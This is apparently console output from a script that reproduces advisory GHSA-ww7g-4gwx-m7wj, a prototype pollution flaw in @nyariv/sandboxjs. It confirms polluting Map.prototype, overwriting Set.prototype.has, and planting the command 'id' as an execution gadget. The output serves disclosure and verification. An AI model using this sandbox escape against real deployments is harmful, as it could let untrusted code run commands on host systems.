============================================================
GHSA-ww7g-4gwx-m7wj Reproduction
@nyariv/sandboxjs prototype pollution via array intermediary
============================================================

[TEST 1] Prototype pollution via array intermediary
Before: "polluted" in Map.prototype = false
After: "polluted" in Map.prototype = true
Map.prototype.polluted = pwned
[PASS] Prototype pollution confirmed!

[TEST 2] Overwrite Set.prototype.has
Set.prototype.has === isFinite: true
[PASS] Set.prototype.has was successfully overwritten!

[TEST 3] RCE gadget via prototype pollution
new Map().cmd = id
[PASS] RCE gadget works - injected command in prototype!
If host code did: execSync(new Map().cmd), it would execute "id"

============================================================
All tests completed - vulnerability confirmed!
============================================================

[Cleanup] Removing prototype pollution...